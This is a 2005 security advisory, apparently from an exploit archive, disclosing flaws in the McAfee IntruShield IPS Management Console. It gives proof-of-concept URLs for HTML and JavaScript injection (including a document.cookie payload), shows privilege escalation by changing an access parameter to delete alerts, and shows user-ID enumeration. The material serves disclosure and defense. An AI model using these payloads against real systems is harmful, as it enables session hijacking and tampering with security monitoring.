exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

McAfeeIPS.txt

McAfeeIPS.txt
Posted Jul 7, 2005
Authored by c0ntex

The McAfee Intrushield IPS Management Console has been found susceptible to html and javascript injection, privilege escalation, and unauthenticated report deletion.

tags | exploit, javascript
SHA-256 | e44cf0de8c358ef924cc85051e0b96755dce09ff74b6909f706270ab2278f337

McAfeeIPS.txt

Change Mirror Download
------=_Part_13419_25560245.1120660746428
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

/*
***************************************************************************=
**************************************
$ An open security advisory #8 - McAfee Intrushield IPS Management Console=
=20
Abuse
***************************************************************************=
**************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 06 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Local / Remote
***************************************************************************=
**************************************
$ This advisory and/or proof of concept code must not be used for commercia=
l=20
gain.
***************************************************************************=
**************************************

McAfee IntruShield Security Management System
http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm


"The McAfee IntruShield Security Management System is an advanced solution=
=20
for administering IntruShield
sensor appliance deployments. The IntruShield Security Management System=20
(ISM) can support both large and
small network intrusion prevention system (IPS) deployments and can scale u=
p=20
to several hundred sensor
appliances. By integrating a comprehensive set of Best-in-Class security=20
management functions, the
IntruShield Security Management System dramatically simplifies and=20
streamlines the complexities associated
with IPS configuration, policy compliance, and threat and response=20
management."

I have found some security vulnerabilities in this product whereby a user=
=20
can elevate their privileges from
a user that can only view alerts logged by remote sensors, to a scenario=20
where the user can gain access to
acknowledge, accept and delete alerts and access the Management Console. It=
=20
is also possible to inject
malicious HTML and JavaScript into the URLS and have this malicious script=
=20
run on the clients machine,
allowing for account information hijacking.

A new version has been released to address these bugs and can be downloaded=
=20
from their site.

*/

Issues:=20
1) Inject HTML
2) Inject JavaScript
3) Access privileged reports
4) Acknowledge and delete alerts
5) Gain access to Management Console

Note: for issues 1 - 4, the attacker needs a valid user account.

1) It is possible to embed HTML into the MISMS. This could potentially allo=
w=20
phishing attacks to be performed
against a valid Manager account.

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=
=3Dfalse&faultResourceName=3DManager&
domainName=3D%2FDemo%3A0&resourceName=3D%2FDemo%3A0%2FManager&resourceType=
=3DManager&
topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&resourceId=3D-1&t=
hirdMenuName=3D<iframe%20src=3D"
http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504=
.htm"%20width=3D800%20height=3D600
>
</iframe>&severity=3Dcritical&count=3D1


2) It is possible to embed JavaScript into the MISMS and have the embedded=
=20
script execute in the security
context of the user browsing the Management System.

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=
=3Dfalse&faultResourceName=3DManager&
domainName=3DDemo&resourceName=3D<script>alert("There could be trouble=20
ahead")</script><script>alert(document.cookie)
</script>&resourceType=3DManager&topMenuName=3DSystemHealthManager&secondMe=
nuName=3DFaults&resourceId=3D-1&thirdMenuName=3D
Critical&severity=3Dcritical&count=3D1


3) It is possible to access the restricted "Generate Reports" section of th=
e=20
MISMS and as such, a non-privileged
user can gain important information regarding the configuration and set-up=
=20
of the IP devices being managed by the
Service. This can be achieved by simply changing the Access option from=20
false to true.

https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?mon=
itoredDomain=3D%2FDemo&
selectedDomain=3D0&fullAccessRight=3Dtrue


4) It is possible to acknowledge, de-acknowledge and delete alerts from the=
=20
MISMS console by modifying URL's
sent to the system by simply changing the Access option from false to true.

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=
=3Dtrue&faultResourceName=3DManager&
domainName=3D%2FDemo%3A0&resourceName=3D%Demo%3A0%2FManager&resourceType=3D=
Manager&
topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&resourceId=3D-1&t=
hirdMenuName=3DCritical&severity=3D
critical&count=3D1

Each change is emailed out to the administrator, however the email only say=
s=20
that "someone" made a change.

5) As default, all user ID values are passed in the URL in the clear,=20
meaning that it is trivial for an attacker
to brute force accounts until a privileged Manager account is found. An=20
example of this would look similar to:

https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D1&logo=3Dintru=
vert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D2&logo=3Dintru=
vert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D3&logo=3Dintru=
vert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D4&logo=3Dintru=
vert.gif

This process can be continued until a valid user ID has been found with=20
privileges to access the configure screen.

Since javascript can be run in the browsers of clients accessing the device=
,=20
it would be possible to redraw the page
with IFRAME's and recreate the user login page to snoop usersnames and=20
passwords.

------=_Part_13419_25560245.1120660746428
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

&nbsp;/*<br>
&nbsp; ********************************************************************=
*********************************************<br>
&nbsp; $ An open security advisory #8 - McAfee Intrushield IPS Management C=
onsole Abuse<br>
&nbsp; ********************************************************************=
*********************************************<br>
&nbsp; 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com<br>
&nbsp; 2: Bug Released: July 06 2005<br>
&nbsp; 3: Bug Impact Rate: Medium / Hi<br>
&nbsp; 4: Bug Scope Rate: Local / Remote<br>
&nbsp; ********************************************************************=
*********************************************<br>
&nbsp; $ This advisory and/or proof of concept code must not be used for co=
mmercial gain.<br>
&nbsp; ********************************************************************=
*********************************************<br>
<br>
&nbsp; McAfee IntruShield Security Management System<br>
&nbsp; <a href=3D"http://www.mcafeesecurity.com/us/products/mcafee/network_=
ips/category.htm">http://www.mcafeesecurity.com/us/products/mcafee/network_=
ips/category.htm</a><br>
<br>
<br>
&nbsp; "The McAfee IntruShield Security Management System is an advanc=
ed solution for administering IntruShield<br>
&nbsp; sensor appliance deployments. The IntruShield Security Management Sy=
stem (ISM) can support both large and<br>
&nbsp; small network intrusion prevention system (IPS) deployments and can =
scale up to several hundred sensor<br>
&nbsp; appliances. By integrating a comprehensive set of Best-in-Class secu=
rity management functions, the<br>
&nbsp; IntruShield Security Management System dramatically simplifies and s=
treamlines the complexities associated<br>
&nbsp; with IPS configuration, policy compliance, and threat and response m=
anagement."<br>
<br>
&nbsp; I have found some security vulnerabilities in this product whereby a=
user can elevate their privileges from<br>
&nbsp; a user that can only view alerts logged by remote sensors, to a scen=
ario where the user can gain access to<br>
&nbsp; acknowledge, accept and delete alerts and access the Management Cons=
ole. It is also possible to inject<br>
&nbsp; malicious HTML and JavaScript into the URLS and have this malicious =
script run on the clients machine,<br>
&nbsp; allowing for account information hijacking.<br>
<br>
&nbsp; A new version has been released to address these bugs and can be dow=
nloaded from their site.<br>
<br>
*/<br>
<br>
&nbsp; Issues: <br>
&nbsp; 1) Inject HTML<br>
&nbsp; 2) Inject JavaScript<br>
&nbsp; 3) Access privileged reports<br>
&nbsp; 4) Acknowledge and delete alerts<br>
&nbsp; 5) Gain access to Management Console<br>
<br>
&nbsp; Note: for issues 1 - 4, the attacker needs a valid user account.<br>
<br>
&nbsp; 1) It is possible to embed HTML into the MISMS. This could potential=
ly allow phishing attacks to be performed<br>
&nbsp; against a valid Manager account.<br>
<br>
&nbsp; <a href=3D"https://intrushield/intruvert/jsp/systemHealth/SystemEven=
t.jsp?fullAccess=3Dfalse&faultResourceName=3DManager&">https://intr=
ushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=3Dfalse&f=
aultResourceName=3DManager&
</a><br>
&nbsp; domainName=3D%2FDemo%3A0&resourceName=3D%2FDemo%3A0%2FManager&am=
p;resourceType=3DManager&<br>
&nbsp; topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&re=
sourceId=3D-1&thirdMenuName=3D<iframe%20src=3D"<br>
&nbsp; <a href=3D"http://www.mcafeesecurity.com/us/about/press/corporate/20=
05/20050411_185504.htm"%20width=3D800%20height=3D600">http://www.mcafe=
esecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20wid=
th=3D800%20height=3D600
</a>><br>
&nbsp; </iframe>&severity=3Dcritical&count=3D1<br>
<br>
<br>
&nbsp; 2) It is possible to embed JavaScript into the MISMS and have the em=
bedded script execute in the security<br>
&nbsp; context of the user browsing the Management System.<br>
<br>
&nbsp; <a href=3D"https://intrushield/intruvert/jsp/systemHealth/SystemEven=
t.jsp?fullAccess=3Dfalse&faultResourceName=3DManager&">https://intr=
ushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=3Dfalse&f=
aultResourceName=3DManager&
</a><br>
&nbsp; domainName=3DDemo&resourceName=3D<script>alert("There
could be trouble&nbsp;
ahead")</script><script>alert(document.cookie)<br>
&nbsp;
</script>&resourceType=3DManager&topMenuName=3DSystemHealthMa=
nager&secondMenuName=3DFaults&resourceId=3D-1&thirdMenuName=3D<=
br>
&nbsp; Critical&severity=3Dcritical&count=3D1<br>
<br>
<br>
&nbsp; 3) It is possible to access the restricted "Generate Reports" sectio=
n of the MISMS and as such, a non-privileged<br>
&nbsp; user can gain important information regarding the configuration and =
set-up of the IP devices being managed by the<br>
&nbsp; Service. This can be achieved by simply changing the Access option f=
rom false to true.<br>
<br>
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/reports/reports-col=
umn-center.jsp?monitoredDomain=3D%2FDemo&">https://intrushield:443/intr=
uvert/jsp/reports/reports-column-center.jsp?monitoredDomain=3D%2FDemo&<=
/a><br>

&nbsp; selectedDomain=3D0&fullAccessRight=3Dtrue<br>
<br>
<br>
&nbsp; 4) It is possible to acknowledge, de-acknowledge and delete alerts f=
rom the MISMS console by modifying URL's<br>
&nbsp; sent to the system by simply changing the Access option from false t=
o true.<br>
<br>
&nbsp; <a href=3D"https://intrushield/intruvert/jsp/systemHealth/SystemEven=
t.jsp?fullAccess=3Dtrue&faultResourceName=3DManager&">https://intru=
shield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=3Dtrue&fau=
ltResourceName=3DManager&
</a><br>
&nbsp; domainName=3D%2FDemo%3A0&resourceName=3D%Demo%3A0%2FManager&=
resourceType=3DManager&<br>
&nbsp; topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&re=
sourceId=3D-1&thirdMenuName=3DCritical&severity=3D<br>
&nbsp; critical&count=3D1<br>
<br>
&nbsp; Each change is emailed out to the administrator, however the email o=
nly says that "someone" made a change.<br>
<br>
&nbsp; 5) As default, all user ID values are passed in the URL in the clear=
, meaning that it is trivial for an attacker<br>
&nbsp; to brute force accounts until a privileged Manager account is found.=
An example of this would look similar to:<br>
<br>
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=
d=3D1&logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=
disp.jsp?userId=3D1&logo=3Dintruvert.gif</a><br>
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=
d=3D2&logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=
disp.jsp?userId=3D2&logo=3Dintruvert.gif</a><br>
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=
d=3D3&logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=
disp.jsp?userId=3D3&logo=3Dintruvert.gif</a><br>
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=
d=3D4&logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=
disp.jsp?userId=3D4&logo=3Dintruvert.gif</a><br>
<br>
&nbsp; This process can be continued until a valid user ID has been found w=
ith privileges to access the configure screen.<br>
<br>
&nbsp; Since javascript can be run in the browsers of clients accessing the=
device, it would be possible to redraw the page<br>
&nbsp; with IFRAME's and recreate the user login page to snoop usersnames a=
nd passwords.<br>
&nbsp; <br>
<br>

------=_Part_13419_25560245.1120660746428--
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close